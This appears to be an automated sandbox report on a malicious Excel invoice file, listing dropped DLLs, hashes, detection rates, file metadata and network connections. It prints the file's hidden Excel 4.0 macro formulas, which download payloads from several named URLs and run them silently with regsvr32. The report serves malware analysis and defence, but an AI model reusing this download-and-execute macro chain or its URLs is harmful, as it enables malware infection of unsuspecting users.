                                                                                      MD5:290B5A7C7EEDF92605DDA68B9F61D6BC
                                                                                      SHA1:B409CA9851FECCA61E6CB0AAAA56FDAAFC7242F5
                                                                                      SHA-256:38B418029CB9E717604336AC6B2AF141A8549EFA0B7DA970CBEE4E0FA199A056
                                                                                      SHA-512:4A0161841098D1C51536B21C0AC40970231478F98FFE2966E8A4DC8D58856669AA25593EF446B3DDA2556366B92D1C4DD892768F210F9B1C8C6E256C9F2B008D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Rechnungskorrektur.xls, Detection: malicious, Browse
                                                                                      • Filename: Rechnung 2022.20.05_1440.xls, Detection: malicious, Browse
                                                                                      IE Cache URL:http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S..................!................... ................................Rich...................PE..d.....b.........." .....`..........|........................................ ............@.............................................r...$...P....p.......P..<....................................................................p.. ............................text...Z^.......`.................. ..`.rdata.......p.......d..............@..@.data....C..........................@....pdata..<....P......................@..@.rsrc........p......."..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61480
                                                                                      Entropy (8bit):7.9951219482618905
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                      MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                      SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                      SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                      SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                      Malicious:false
                                                                                      Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):162196
                                                                                      Entropy (8bit):6.301436092020807
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                                                                      MD5:E721613517543768F0DE47A6EEEE3475
                                                                                      SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                                                                      SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                                                                      SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                                                                      Malicious:false
                                                                                      Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):3.4344832916567816
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ODRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vg9s1Xb:OVKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uf
                                                                                      MD5:FEB082659EDCEF8A2B3CDC150B38C817
                                                                                      SHA1:B800D29AF62E6C1D6EBBEFBA7ABCB92FAB3B3826
                                                                                      SHA-256:88835663ED10875B6C5BE1EE758F7E31BC9AB979A9B20F3E6E86F7DDE0969056
                                                                                      SHA-512:8890D3EF3A02C39FD46C5283BA38AFE6B451EF6E1C394EDC162F76172521BCB0674ED67F934C626012DF4A65DFEFF2D73ADF87BC70CB5B6C422FCBCA2D0163F4
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 08:38:10 2022, Security: 0
                                                                                      Category:dropped
                                                                                      Size (bytes):69120
                                                                                      Entropy (8bit):6.453679493508971
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:gVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+u9s1a6YG2jzQ0viPvDNHhGty:+Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMq
                                                                                      MD5:825BF3DFA97B31B108A2695618E3FC1B
                                                                                      SHA1:B20D8EF763B0EB330619BC88881A4F799BD2FE45
                                                                                      SHA-256:790FBCD1AED3CD4C9064C9AB7AF433A61B80A647EACF0E0320857441658CFE60
                                                                                      SHA-512:BC3AFEED00333DC3B4F6148A8BC25B85867A07DC23A6C6FB7983BB6FC4E0AD408F6F7F2704F16FEA825BC06B52CBB16C53239C63E0F104C61DE7209C67FBB67A
                                                                                      Malicious:true
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158100775230176
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTM0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3T1RIvgMSS3AyUrhYu3j
                                                                                      MD5:3E28EC446EC996E82C1330164271ACDD
                                                                                      SHA1:61FD8CCDFFDC93C3FE10D926524701E926499B8E
                                                                                      SHA-256:8975189B8CB95CA5DC8EDAE1AC48C816A065467355B5C8678C6D9C0323C8F13B
                                                                                      SHA-512:19864DF1260BF4DCCF22B84ACCB50D09C27D499582A2166F7B419B7FD5D16B2C31DF3E199009A449E38BAAAC853EDD8B3F60F0330176E316F032C645D6840090
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):376320
                                                                                      Entropy (8bit):7.110062137113599
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:3LAmffHSqTgEIUvQbPR7PzWtM8aoAVXywf1Ey3B86v/MUxo1/BwNPAtZZr:7AmffHcjSO7lrfyyR8Gm1/Sex
                                                                                      MD5:290B5A7C7EEDF92605DDA68B9F61D6BC
                                                                                      SHA1:B409CA9851FECCA61E6CB0AAAA56FDAAFC7242F5
                                                                                      SHA-256:38B418029CB9E717604336AC6B2AF141A8549EFA0B7DA970CBEE4E0FA199A056
                                                                                      SHA-512:4A0161841098D1C51536B21C0AC40970231478F98FFE2966E8A4DC8D58856669AA25593EF446B3DDA2556366B92D1C4DD892768F210F9B1C8C6E256C9F2B008D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S..................!................... ................................Rich...................PE..d.....b.........." .....`..........|........................................ ............@.............................................r...$...P....p.......P..<....................................................................p.. ............................text...Z^.......`.................. ..`.rdata.......p.......d..............@..@.data....C..........................@....pdata..<....P......................@..@.rsrc........p......."..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158103111942775
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTD0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TeRIvgMSS3AyUrhYu3j
                                                                                      MD5:DC718A4E9DA03BBC0673313CD6D7715C
                                                                                      SHA1:C500D8F78D3EFFA575F7AD020513B2CDD96653DC
                                                                                      SHA-256:67C21491D013E6DBE6E123530F6686010163E75EF3DF41CEEBF7601C78692434
                                                                                      SHA-512:7053E6BCF2E6F8DDC51E4152993E86DFBA83E6DD0EE3476F77CD7DCB916ADAB611730DF1B5E936BE476C73DE5F2241BFF96CCE53697DE4693DBE943457785D0C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158103111942775
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTD0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TeRIvgMSS3AyUrhYu3j
                                                                                      MD5:DC718A4E9DA03BBC0673313CD6D7715C
                                                                                      SHA1:C500D8F78D3EFFA575F7AD020513B2CDD96653DC
                                                                                      SHA-256:67C21491D013E6DBE6E123530F6686010163E75EF3DF41CEEBF7601C78692434
                                                                                      SHA-512:7053E6BCF2E6F8DDC51E4152993E86DFBA83E6DD0EE3476F77CD7DCB916ADAB611730DF1B5E936BE476C73DE5F2241BFF96CCE53697DE4693DBE943457785D0C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158100775230176
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTM0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3T1RIvgMSS3AyUrhYu3j
                                                                                      MD5:3E28EC446EC996E82C1330164271ACDD
                                                                                      SHA1:61FD8CCDFFDC93C3FE10D926524701E926499B8E
                                                                                      SHA-256:8975189B8CB95CA5DC8EDAE1AC48C816A065467355B5C8678C6D9C0323C8F13B
                                                                                      SHA-512:19864DF1260BF4DCCF22B84ACCB50D09C27D499582A2166F7B419B7FD5D16B2C31DF3E199009A449E38BAAAC853EDD8B3F60F0330176E316F032C645D6840090
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):376320
                                                                                      Entropy (8bit):7.110062137113599
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:3LAmffHSqTgEIUvQbPR7PzWtM8aoAVXywf1Ey3B86v/MUxo1/BwNPAtZZr:7AmffHcjSO7lrfyyR8Gm1/Sex
                                                                                      MD5:290B5A7C7EEDF92605DDA68B9F61D6BC
                                                                                      SHA1:B409CA9851FECCA61E6CB0AAAA56FDAAFC7242F5
                                                                                      SHA-256:38B418029CB9E717604336AC6B2AF141A8549EFA0B7DA970CBEE4E0FA199A056
                                                                                      SHA-512:4A0161841098D1C51536B21C0AC40970231478F98FFE2966E8A4DC8D58856669AA25593EF446B3DDA2556366B92D1C4DD892768F210F9B1C8C6E256C9F2B008D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S..................!................... ................................Rich...................PE..d.....b.........." .....`..........|........................................ ............@.............................................r...$...P....p.......P..<....................................................................p.. ............................text...Z^.......`.................. ..`.rdata.......p.......d..............@..@.data....C..........................@....pdata..<....P......................@..@.rsrc........p......."..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 08:38:10 2022, Security: 0
                                                                                      Entropy (8bit):6.4534737128183925
                                                                                      TrID:
                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                      File name:RechnungsDetails.xls
                                                                                      File size:69138
                                                                                      MD5:3264e16e2d21836e4087e76d0943b8b4
                                                                                      SHA1:525547db03f6c255882476ac9b16c305731b4ad1
                                                                                      SHA256:30b599f8110f4a5c63bd656e7fe30a405de553e221c48932aa9eaef5625c3b77
                                                                                      SHA512:37bf9e22d0c2568d5b3f918ea0b6a4bdd9fdba3847f86ffff316639d8e5009d334e72eb7b850b567051a1bbb0aa69a59ebf58ee5abdbad6c693c567b656dfdbe
                                                                                      SSDEEP:1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+u9s1a6YG2jzQ0viPvDNHhGto:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMQ
                                                                                      TLSH:82635A467A59C92DF914D33549D74BA97316FC318F6B0A833225F324AFFD8A09A0361B
                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                      Icon Hash:e4eea286a4b4bcb4
                                                                                      Document Type:OLE
                                                                                      Number of OLE Files:1
                                                                                      Has Summary Info:
                                                                                      Application Name:Microsoft Excel
                                                                                      Encrypted Document:False
                                                                                      Contains Word Document Stream:False
                                                                                      Contains Workbook/Book Stream:True
                                                                                      Contains PowerPoint Document Stream:False
                                                                                      Contains Visio Document Stream:False
                                                                                      Contains ObjectPool Stream:False
                                                                                      Flash Objects Count:0
                                                                                      Contains VBA Macros:False
                                                                                      Code Page:1251
                                                                                      Author:Dream
                                                                                      Last Saved By:TYHRETH
                                                                                      Create Time:2015-06-05 18:19:34
                                                                                      Last Saved Time:2022-05-20 07:38:10
                                                                                      Creating Application:Microsoft Excel
                                                                                      Security:0
                                                                                      Document Code Page:1251
                                                                                      Thumbnail Scaling Desired:False
                                                                                      Company:
                                                                                      Contains Dirty Links:False
                                                                                      Shared Document:False
                                                                                      Changed Hyperlinks:False
                                                                                      Application Version:1048576
                                                                                      General
                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                      File Type:data
                                                                                      Stream Size:4096
                                                                                      Entropy:0.407040667464
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G
                                                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 18 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 d7 00 00 00
                                                                                      General
                                                                                      Stream Path:\x5SummaryInformation
                                                                                      File Type:data
                                                                                      Stream Size:4096
                                                                                      Entropy:0.281284383303
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . T Y H R E T H . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                      General
                                                                                      Stream Path:Workbook
                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                      Stream Size:58873
                                                                                      Entropy:7.0959162425
                                                                                      Base64 Encoded:True
                                                                                      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T Y H R E T H B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
                                                                                      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 07 00 00 54 59 48 52 45 54 48 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                      Name:PKEKPPGEKKPGE
                                                                                      Type:4
                                                                                      Final:False
                                                                                      Visible:False
                                                                                      Protected:False
                                                                                      PKEKPPGEKKPGE4False0Falsepre7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/","..\uxevr1.ocx",0,0)",F11)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/","..\uxevr2.ocx",0,0)",F15)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://masyuk.com/581voyze/MlX/","..\uxevr3.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/","..\uxevr4.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)=FORMULA("=RETURN()",F29)
                                                                                      Name:PKEKPPGEKKPGE
                                                                                      Type:4
                                                                                      Final:False
                                                                                      Visible:False
                                                                                      Protected:False
                                                                                      PKEKPPGEKKPGE4False0Falsepost7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/","..\uxevr1.ocx",0,0)",F11)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/","..\uxevr2.ocx",0,0)",F15)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://masyuk.com/581voyze/MlX/","..\uxevr3.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/","..\uxevr4.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)=FORMULA("=RETURN()",F29)10,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/","..\uxevr1.ocx",0,0)12,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")14,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/","..\uxevr2.ocx",0,0)16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://masyuk.com/581voyze/MlX/","..\uxevr3.ocx",0,0)20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/","..\uxevr4.ocx",0,0)24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")28,5,=RETURN()
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 23, 2022 08:59:56.508605003 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:56.508644104 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:56.508713007 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:56.520324945 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:56.520356894 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:56.703500032 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:56.703655958 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:56.720774889 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:56.720813990 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:56.721216917 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:56.721602917 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.048538923 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.092494011 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.228203058 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.228373051 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.228382111 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.228452921 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.228492022 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.228512049 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.228668928 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.228810072 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.228936911 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.229020119 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.229068041 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.229151011 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.235040903 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311139107 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.311283112 CEST44349173212.98.224.29192.168.2.22
